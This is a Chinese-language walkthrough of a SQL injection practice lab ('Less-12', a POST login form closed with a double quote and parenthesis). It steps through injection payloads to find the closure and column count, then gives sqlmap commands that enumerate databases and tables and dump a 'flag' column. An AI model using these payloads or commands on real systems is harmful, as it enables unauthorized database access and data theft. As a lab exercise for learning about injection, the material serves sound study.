Less-12
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)
1.判断是否存在注入
uname=1'&passwd=a&submit=Submit
无回显
uname=1"passwd=a&submit=Submit
错误回显 => 存在注入
2.判断参数类型
uname=1 or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
错误回显 => 字符型
3.进行参数闭合
uname=1' or 1=1#&passwd=a&submit=Submit
无回显
uname=1" or 1=1#&passwd=a&submit=Submit
错误回显 => 第一位闭合
uname=1") or 1=1#&passwd=a&submit=Submit
登录回显 => 闭合成功
4.查看这个网站后台数据库所在的表有几列
uname=1") order by 2#&passwd=a&submit=Submit
无回显
uname=1") order by 3#&passwd=a&submit=Submit
报错回显 => 有2列
5.进行 union select联合查询,发现输出位
uname=1") union select 1,2#&passwd=a&submit=Submit
6.使用sqlmap进行注入
6.1用bp进行抓包并保存到与sqlmap相同的路径之下。
6.2利用sqlmap查询注入点
python sqlmap.py -r burp.txt --answers="extending=N" --threads=20 --leve=5 --risk=3
6.4使用sqlmap查看所在数据库和数据库版本
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 --dbs
7.查看数据库的表
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" --tables
8.查看5oIWbCUu表中的列
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" --columns
9.查看表中的flag列中的数据
python sqlmap.py -r burp.txt --batch --threads=20 --leve=5 --risk=3 -D "security" -T "5oIWbCUu" -C "flag" --dump

浙公网安备 33010602011771号